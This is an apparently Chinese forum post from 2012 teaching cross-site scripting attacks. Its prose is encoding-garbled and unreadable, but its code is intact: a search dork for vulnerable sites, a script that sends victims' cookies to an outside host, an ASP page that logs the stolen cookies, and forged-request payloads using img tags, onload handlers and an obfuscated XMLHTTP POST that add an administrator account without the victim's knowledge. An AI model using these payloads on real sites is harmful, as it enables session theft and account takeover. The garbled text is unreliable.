admin 2012-9-13 17:08:58

ʵսxss©

ǰһλѷ˸̨XSSõӣҾһۣԭΪ

http://tieba.baidu.com/f?kz=1069007239

˵ֻһ˼·Ǻϸ˵ų́XSSʵں̨һDzǣXSSģֻһ˲תת⣬ܶ༭ĺ̨Dz˲תеhtmlģewebֱӱ༭µʱhtml룬Ϊcookieṩ˺ܶᡣ

ǣ˵ǣʹǹcookieҲDzʹlocationַģΪ̫ˣһ㶼ʹַͨģiframeJSȵȡ

ϱߵ˵߽IJǺϸϣһϸý̳̣ǽһλѾͷһϸЩ£ͷ󲩿øҪѿƪ¡

ǶXSSһܼ򵥵ãԭܼ򵥣Ҫڿգֻ֪XSSǼ򵥵ĵô򵥵ģкܶüֵģڹ⣬XSSѾΪվɱ֮һڵĺܶվҶ˼ŵ˷SQLעϣӦĶXSSķͺ٣ҲXSSܳɹԭ֮һ

ˣϻ˵ˣһ°ɡ

-------------------------------------------------------------------

ҪҵһXXSվͲʲôվˣȸһinurl:'Product.asp?BigClassName'ѳҲȽϸߡһ<script>alert('xxs')</script>һ¡Ǻǣˡ



ٿԼCookieɣalertݻdocument.cookieͿˣͼ



ҪѵĶռǵļ±ҪҪһԼվ㣬˼·
1:ĿѿվַȻִַнű
2:ȻתѾдרռCookieַ

ʵַ
ȹ<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>
仰˼ǴһµĴڣhttp://dlgyi.rrvv.net/cookie.aspַͨmsgһıҪռcookieˡ

ҪԼдһҳ棬ҲռԷcookieҳ棬ģ

<html>
<title>xx</title>
<body>
<%
testfile = Server.MapPath("code.txt") //ȹһ·ҲȡվĿ¼һڸĿ¼µcode.txt·testfile
msg = Request("msg")   //ȡύmsgҲcookieֵ
set fs = server.CreateObject("scripting.filesystemobject")һfs
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")//code.txtдȡcookie
thisfile.close   //ر
set fs = nothing
%>
</body>
</html>

Ȼ󱣴棬Լϣ˵õXXSҳ棬ͻԶվĸĿ¼һı




óǺǣCookie֣



ֻש񣬶ûжʵսֵһܶվ˵+ַӷԴվҲ˵XXSּڸһϰ򵼣Ͼ˭һʼѧϰͿRIվСվʼ֣һ˵ҲO(_)O~

PSһСʾύ<script>alert('xxs')</script>վûзӦʱҪ̾͵Xһ鿴һվԴ룬վ׹˵ʲôַͨ밡ķǻۣƹˡֻҪС۾ʤˡ

-------------------------------------------------------------------

ҶӵĻظҲһɣ

˵ʵֺ̨XSSʵòģһСվõcookieҲûʲôüֵվĻcookieװʲôģǣĶˣͨűС˵վʱǺް취˻뵽XSSģվʱXSS÷ƪイIJģԽһ¡

ǣ½Ѿ̨shellõ㶫˵ߵԭǣ֪ģڴ󲿷վcookie+sessionģһû벻ֱӷŵcookieˣߵԭ
ߣվʱcookieһ̨ԴĻԽһãӸԱʲôġ

µ˳һXSS˼·Ҳԭԭӣ

http://user.qzone.qq.com/673116767/blog/1252452536

һ㷢һxss©ҪĻϾЩ

1.αʹ$_REQUEST$_GET

ҪҸվʹõijDzҵԴ룬ҵԴĻȥ̨ԱӹԱҳ棬ȻԱʹõDz$_REQUESTղǵĻʹøXSS©һ󣬱ǰ̨пʹHTML룬ôǾǶһIMGԪأ
<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />
Ա¼̨󿴵imgҳʱ򣬾αһӺ̨Ա󣬶ɹԱģ˳һµĹԱ

ǿı༭Գʹ룺
http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')
ջṹ
<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />
֮Ҫһ

2. αʹ$_POST

̨ӹԱĹıʱʹõ$_POSTʽôһַЧûй<script>ǿͨajaxʽα磺
<sc/*xss*/ript type="text/javascript">
var aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");
aj.open("POST", "/admin/admin_add.asp", false);
var postdata = 'name=xxx&psd=yyy';
aj.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
aj.send(postdata);
</scr/*xss*/ipt>
/*xss*/HTMLעͣƹ򵥵ĶscriptĹˡ

3. վα ʹ$_GET $_REQUEST

һαķʽƣǵһαվڵxss©еģվαվⷢģҵIJ͵ҳһͼƬ
<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>
ȻܵdvbbsϷӣ̳ĹԱҵIJ̳ͣĹԱѾ¼Ĺ̨Ȼʹù̵Ŀǰieں˵myie,maxtonȵȻfirefoxǹ̵ģҵIJͣôĺ̨ͻᱻһû

4.վα ʹ$_POST0day

ĿĹ̨ʹõ$_POSTʽܱô޷ǵվվʹajaxpostʽύݹȥΪajax޷ġ

ǿǵվһformдݣformactionΪҪõ©ҳ棬Ȼ˴򿪸ҳʱǾjsƸformsubmitajaxȻܿ򣬵֮ĵַύformǿԵġ

֮34ַɹҪСһЩΪҪ취Ѿ¼̨ĹԱʹùsessionǵαҳ棬һṤѧļ

OK˵Ķ˵ˣOver
ҳ: [1]
鿴汾: ʵսxss©